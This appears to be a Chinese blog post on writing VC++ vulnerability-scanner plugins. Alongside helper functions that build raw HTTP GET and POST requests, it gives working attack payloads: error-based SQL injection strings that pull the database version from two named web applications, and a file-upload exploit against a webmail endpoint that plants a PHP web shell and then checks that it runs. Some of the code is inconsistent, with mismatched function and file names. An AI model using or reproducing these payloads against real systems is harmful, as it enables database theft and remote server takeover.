关于VC编写插件的写法

发布时间:April 26, 2015 // 分类:VC/C/C++,代码学习,windows // No Comments

VC 插件每次更新都需要重新编译一次,好麻烦的说。

首先构建一个包含 GET 请求和 POST 请求方法的类

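void GetRequest(char *url,BOOL bRecv,BOOL bSmall)
{
    // Build a raw HTTP/1.1 GET request for `url` (appended to m_strWebRoot)
    // and hand the finished packet to sendToTarget().
    //   url    - request path; spaces are percent-encoded, CR/LF are stripped
    //   bRecv  - forwarded to sendToTarget() unchanged (whether to read the reply)
    //   bSmall - forwarded to sendToTarget() unchanged
    // Reads the members/globals m_strWebRoot, m_strHost, cookie and defaultCharset.

    CString enUrl = url;
    enUrl.Replace(" ", "%20");
    // A CR or LF inside the path would end the request line early and push
    // whatever follows into the header block; drop them so the packet always
    // has exactly the shape the format string below describes.
    enUrl.Remove('\r');
    enUrl.Remove('\n');

    // The Cookie header is only emitted once a cookie value has been set.
    CString cookieValue;
    if (!cookie.IsEmpty())
    {
        cookieValue = "Cookie: " + cookie + "\r\n";
    }

    // CString is passed to the varargs Format() via its const char* conversion
    // rather than GetBuffer(0), which hands out a writable buffer that must be
    // paired with ReleaseBuffer().
    CString GetPackage;
    GetPackage.Format("GET %s%s HTTP/1.1\r\n"
                      "Accept: */*\r\n"
                      "Accept-Language: zh-cn\r\n"
                      //"Accept-Encoding: gzip, deflate\r\n"
                      "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
                      "%s"
                      "Host: %s\r\n\r\n",
                      static_cast<const char*>(m_strWebRoot),
                      static_cast<const char*>(enUrl),
                      static_cast<const char*>(cookieValue),
                      static_cast<const char*>(m_strHost));

    // Both the web root and the path may contain non-ASCII characters, so the
    // whole packet is converted to the target's charset. PostRequest() compares
    // defaultCharset against "utf8" while this builder historically compared
    // against "utf"; both spellings are accepted so the two agree.
    CString encodedPack;
    if (defaultCharset == "utf" || defaultCharset == "utf8")
    {
        encodedPack = EncodeHanzi(GetPackage, CP_ACP, CP_UTF8);
    }
    else
    {
        encodedPack = EncodeHanzi(GetPackage, CP_ACP, CP_ACP);
    }

    // sendToTarget() takes a writable char*, so GetBuffer() is required here;
    // release it once the call returns.
    sendToTarget(encodedPack.GetBuffer(0), bRecv, bSmall);
    encodedPack.ReleaseBuffer();
}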
 
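void PostRequest(char *url, char *data,BOOL bRecv)
{
    // Build a raw HTTP/1.1 POST (application/x-www-form-urlencoded) for `url`
    // (appended to m_strWebRoot) carrying `data` as the body, then hand it to
    // sendToTarget().
    //   url   - request path; spaces are percent-encoded, CR/LF are stripped
    //   data  - form body as sent on the wire (may be NULL, treated as empty);
    //           the length of its charset-converted form becomes Content-Length
    //   bRecv - forwarded to sendToTarget() unchanged (whether to read the reply)
    // Reads the members/globals m_strWebRoot, m_strHost, cookie and defaultCharset.

    CString enUrl = url;
    enUrl.Replace(" ", "%20");
    // A CR or LF inside the path would end the request line early and push
    // whatever follows into the header block; drop them so the packet always
    // has exactly the shape the format string below describes.
    enUrl.Remove('\r');
    enUrl.Remove('\n');

    // CString(NULL) is empty, so a missing body yields Content-Length: 0
    // instead of handing a null pointer to EncodeHanzi().
    CString body = data;

    // The Cookie header is only emitted once a cookie value has been set.
    CString cookieValue;
    if (!cookie.IsEmpty())
    {
        cookieValue = "Cookie: " + cookie + "\r\n";
    }

    // Path and body may contain Chinese text; convert only these two
    // caller-supplied parts (unlike GetRequest(), which converts the whole
    // packet) so that Content-Length is computed from the bytes actually sent.
    CString encodedUrl, encodedData;
    if (defaultCharset == "utf8" || defaultCharset == "utf")
    {
        encodedUrl  = EncodeHanzi(enUrl, CP_ACP, CP_UTF8);
        encodedData = EncodeHanzi(body, CP_ACP, CP_UTF8);
    }
    else
    {
        encodedUrl  = EncodeHanzi(enUrl, CP_ACP, CP_ACP);
        encodedData = EncodeHanzi(body, CP_ACP, CP_ACP);
    }

    // CString is passed to the varargs Format() via its const char* conversion
    // rather than GetBuffer(0), which hands out a writable buffer that must be
    // paired with ReleaseBuffer().
    CString PostPackage;
    PostPackage.Format("POST %s%s HTTP/1.1\r\n"
                       "Accept: */*\r\n"
                       "Content-Type: application/x-www-form-urlencoded\r\n"
                       "Host: %s\r\n%s"
                       //"Accept-Encoding: gzip, deflate\r\n"
                       "Content-Length: %d\r\n"
                       "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\r\n\r\n%s",
                       static_cast<const char*>(m_strWebRoot),
                       static_cast<const char*>(encodedUrl),
                       static_cast<const char*>(m_strHost),
                       static_cast<const char*>(cookieValue),
                       encodedData.GetLength(),
                       static_cast<const char*>(encodedData));

    // sendToTarget() takes a writable char*, so GetBuffer() is required here;
    // release it once the call returns.
    sendToTarget(PostPackage.GetBuffer(0), bRecv);
    PostPackage.ReleaseBuffer();
}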

然后声明这两个函数及其参数(含默认值)

// Declarations of the two request builders. NOTE(review): the definitions shown
// above are named GetRequest/PostRequest — presumably the same functions under
// their member names; confirm against the class header.
void makePostRequest(char *url, char *data,BOOL bRecv=FALSE);  // url, form body, whether to read the server's response
    void makeGetRequest(char *url,BOOL bRecv=FALSE,BOOL bSmall=FALSE); // url, whether to read the server's response, bSmall is forwarded to sendToTarget()

然后我们分别看一下调用 GET 请求和 POST 请求的例子

首先是 GET 请求的例子,漏洞来源:http://0day5.com/archives/3021

GetRequest("/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23",TRUE);  //发送请求以及确定要接收服务器返回的参数
    //GET请求
    CString strRet=getInfo("Duplicate entry '(.*?)'");
    //使用正则进行匹配
    if (strRet!="")  //如果strRet不为空表示存在注入
    {
        return "/wap/?action=show&mod=admin where userid存在显错式注入! 版本"+strRet;
    }

再来看一个 POST 请求的例子,漏洞详情请见:http://0day5.com/archives/3028

PostRequest("/delete_cart_goods.php","id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",TRUE);
//PostRequest(url,data,ture/false)
    strRet=getInfo("Duplicate entry '(.*?)'");
    if (strRet!="")
    {
        return "/delete_cart_goods.php id存在post显错式注入! 版本"+strRet;
    }

还有一种文件上传的方式,漏洞详情请见:http://0day5.com/archives/3039

它的数据包是这个样子的

POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1
Host: mail.domain.com:889
Connection: keep-alive
Content-Length: 658
Origin: http://mail.domain.com:889
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Accept: */*
Referer: http://mail.domain.com:889/src/write_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn
 
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filename"
 
vultest.php
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="PHPSESSID"
 
outb98m2mckt5a03pejd1aqra0
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="dir"
 
/var/www/newmail/
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filedata"; filename="vultest.php"
Content-Type: application/octet-stream
 
12345
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Upload"
 
Submit Query
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--

我们把它分成头部还有内容两个部分

头部是这样子的

POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1
Host: mail.domain.com:889
Connection: keep-alive
Content-Length: 658
Origin: http://mail.domain.com:889
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Accept: */*
Referer: http://mail.domain.com:889/src/write_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn

内容部分是这个样子的

------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filename"
 
vultest.php
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="PHPSESSID"
 
outb98m2mckt5a03pejd1aqra0
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="dir"
 
/var/www/newmail/
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filedata"; filename="vultest.php"
Content-Type: application/octet-stream
 
12345
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Upload"
 
Submit Query
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--

然后就好办了,把它转义成 C 字符串:每个换行写成 \r\n,双引号 " 记得写成 \"。

CString uploadPack="",uploadHead="",uploadBody="";//首先我们定义个数据包,数据的头部和数据的内容
uploadBody="------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\nguige.php\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"PHPSESSID\"\r\n\r\noutb98m2mckt5a03pejd1aqra0\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/var/www/newmail/\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @$_GET[0](@$_REQUEST[1]);?>\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Upload\"\r\n\r\nSubmit Query\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--";
//这里是数据的内容
uploadHead.Format("POST /src/big_att_upload.php HTTP/1.1\r\nHost: %s\r\nConnection: keep-alive\r\nContent-Length: %d\r\nOrigin: http://%s\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nAccept: */*\r\nReferer: http://%s/src/write_mail.php\r\nCookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn\r\n\r\n",
//数据的头部
m_strHost,uploadBody.GetLength(),m_strHost,m_strHost);
//得出数据的地址,内容,以及长度
uploadPack=uploadHead+uploadBody;
//对数据进行拼接组合起来
sendToTarget(uploadPack.GetBuffer(0),TRUE);
//发送数据
//判断一句话是否存在
makePostRequest("/shell.php?0=assert","1=echo 1;",TRUE);
if(GetResponseContent().Find("1",0)!=-1){
return "http://"+m_strHost+m_strWebRoot+"/guige.php?0=assert 密码1";
}

 
